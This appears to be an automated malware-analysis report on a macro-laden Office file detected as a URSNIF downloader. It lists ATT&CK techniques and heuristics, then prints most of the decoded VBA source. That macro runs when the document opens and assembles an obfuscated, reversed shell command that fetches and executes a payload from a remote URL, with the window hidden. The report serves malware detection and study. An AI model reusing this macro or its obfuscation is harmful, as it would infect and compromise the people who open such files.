MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File Execution: User Execution: Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and utilizes the Shell() function, indicating an attempt to execute arbitrary code. The script appears to be constructing a command to download and execute a payload, likely using 'cmd.exe'. The ClamAV detection as 'Doc.Downloader.URSNIF' further supports this behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4571 bytes |
SHA-256: ae9e885a9fda532742dcdd92fc857ecec4ea2313bff76775622e8f69face7514 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wnVLunEjJzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Second "111137847" + "DYQ" + "SM" + "6690"
Second "MiPaPkIwSEFRm" + "406691407" + "ZpitBrkpQIliVM" + "zjdRsJPiJ"
Second "LMjTi" + "HwbjYLXM"
Second "ol" + "95576406"
Second "110675714" + "325246635"
Shell HuRSk + LcDNLGKzcR, CStr(vbHide)
Second "S" + "cztmKGV"
Second "jmza" + "as"
Second "aYch" + "HAOO" + "QH" + "265823861"
End Sub
Attribute VB_Name = "uLqijUnU"
Function HuRSk()
On _
Error _
Resume _
Next
Second "SbvdaqRqNUkAFs" + "IMnq"
Second "OGhU" + "428191817" + "6641" + "5056"
VzTlrdoso = Format(Chr(13 + 8 + 15 + 1 + 62)) + "m" + "d " + "/V/" + Format(Chr(8 + 6 + 10 + 0 + 43)) + Format(Chr(4 + 2 + 4 + 0 + 24)) + "^s^" + "et 3" + "^b" + "S= "
Second "mKz" + "KlorYS"
Second "FmGu" + "99654972" + "iYmTchnXXIDCX" + "8090"
Second "amX" + "K"
Second "zNqD" + "286739490"
uRbmQcDuczj = " ^" + " ^ ^ " + "^ " + " ^ " + "}}{^h" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "ta" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "^}" + ";^kaer" + "b;" + "F"
Second "DU" + "tSbcYbw"
TFfSQuzqpA = "RX$" + " ^m" + "e^t^I" + "^-e^" + "ko" + "vn^I^" + ";)" + "^FR" + "X^" + "$ ^,^D" + "Hh$(^e^" + "li^F" + "^"
Second "1889" + "Dpl" + "120968024" + "UPqfzrRiVfuBcC"
Second "QKmYmUaFViF" + "NUjKpGQJzdKFI"
Second "8251" + "AbCwOrj"
Second "2479" + "MW"
WDoVaTLM = "d^a^ol" + "nw" + "^o" + "^D^." + "^z^hs$^" + "{^" + "y" + "r^t{)Sp" + "o^" + "$ n^" + "i ^D" + "H"
Second "sj" + "240" + "fKiLUwHTM" + "280446805"
Second "GSmYlPUpnzj" + "580" + "WsnQl" + "Vf"
Second "455723977" + "ojc"
TULoFVNUh = "^h" + "$(^h" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "^" + "a" + "er^of" + "^;^'e" + "^x^" + "e" + "^." + "'+p^Mv"
Second "332" + "i" + "XEpBWrsic" + "UCLrTs"
NWKXwEcbz = "$" + "+^'\'^+" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "i^lbu" + "p^:vn" + "e$"
Second "1232" + "432296761"
Second "LlIWAiBfKC" + "9900"
Second "zuMTjfVNq" + "SSQHsNKioRIolt" + "TO" + "OCmSu"
qodJisiqP = "=^FR" + "X^$^;^'" + "005^' ^" + "=^ p" + "Mv$;)" + "'^@" + "^'" + "(t^" + "i" + "l^pS" + "^"
Second "zYuc" + "CY"
Second "bsqv" + "Ff"
Second "9215" + "Qi" + "GjVPTHktZER" + "454384954"
Second "iJNOcY" + "JS" + "NRvw" + "342620897"
jLkTmUvYMVb = ".^'" + "nkt.^1" + "^1g^m" + "^o" + "=^" + "l" + "?p^h^p" + "^" + ".^t^" + "o" + "^ksn^a" + "^p" + "o/^T^T"
Second "402" + "krwMuYDi"
Second "291497204" + "znOvmuHwH" + "JiaNLz" + "449040786"
Second "d" + "5050" + "R" + "4646"
PHAOijSizRs = "R/^m" + "^o" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "." + "^w^qe^" + "w^" + "qe" + "^b^us^" + "ai^" + "yv^" + "h//:^p" + "tth^'" + "^=^Sp" + "^" + "o^$^;tn"
Second "rGBwI" + "h" + "1594" + "3813"
WTSNYOokTJ = "e^i^l" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "b^eW.t" + "eN" + " t" + Format(Chr(13 + 8 + 15 + 1 + 62)) + "e^j" + "bo^-^w"
Second "BQiB" + "55" + "106400059" + "AQJi"
Second "rGmFmCwMIzSdH" + "iGGJVvrSqHQaD"
Second "v" + "JP" + "GRQSjPWLJ" + "8955"
dTVNisidWq = "^en=^z" + "^hs$" + "^ ^l^" + "l^e" + "hsre" + "w^op" + "&&f^or " + "/^L %" + "^F ^in " + "(" + "2^64^;"
Second "K" + "216384363" + "KjbdUOzV" + "156"
Second "4164" + "nbH"
Second "A" + "106865946"
dEOTbii = "^-" + "1^" + ";^0)d^" + "o ^s^" + "et"
Second "zM" + "EYPioMwpQ"
CNaBHioraFo = " h" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "^ux=" + "!h" + Format(Chr(8 + 6 + 10 + 0 + 43)) + "^ux" + "!!3^bS:" + "~" + "%^"
HuRSk = VzTlrdoso + uRbmQcDuczj + TFfSQuzqpA + WDoVaTLM + TULoFVNUh + NWKXwEcbz + qodJisiqP + jLkTmUvYMVb + PHAOijSizRs + WTSNYOokTJ + dTVNisidWq + dEOTbii + CNaBHioraFo
Second "YzTYaijBjuz" + "Ydwwt" + "w" + "137679114"
End Function
Function LcDNLGKzcR()
On _
Error _
Resume _
Next
Second "GBu" + "8664"
VAhGzkaZS = "F," + "1!&&^" + "i^f " + "%^" + "F ^e
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.